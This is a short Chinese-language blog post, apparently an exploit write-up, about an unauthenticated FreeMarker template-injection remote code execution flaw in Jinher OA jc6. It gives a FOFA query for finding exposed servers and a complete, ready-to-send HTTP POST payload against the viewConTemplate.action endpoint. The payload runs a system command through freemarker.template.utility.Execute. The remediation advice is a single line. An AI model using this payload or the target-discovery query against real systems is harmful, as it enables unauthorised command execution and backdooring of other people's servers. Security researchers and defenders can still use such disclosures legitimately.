Babing
Published on 2024-08-30 / 2 Visits
0
0

J1-2金和-OA-RCE

J1-2金和-OA-RCE

漏洞描述:

金和OA jc6 portalwb-con-template!viewConTemplate.action 接口存在FreeMarker模板注入漏洞,未经身份验证的攻击者可以利用此漏洞远程代码执行、写入后门文件,导致服务器存在被控的风险。

影响版本:

至2024年3月30日

网站图片:

image.png

网络测绘:

fofa语法:

FOFA:app=“金和网络-金和OA”

漏洞复现:

payload:

POST /jc6/platform/portalwb/portalwb-con-template!viewConTemplate.action HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded

moduId=1&code=%253Cclob%253E%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%28%29%28%2522ipconfig%2522%29%257D%253C%252Fclob%253E&uuid=1

效果图:
351135cf81b1492c99b2162e65997237.png

修复建议:

更新到最新系统


Comment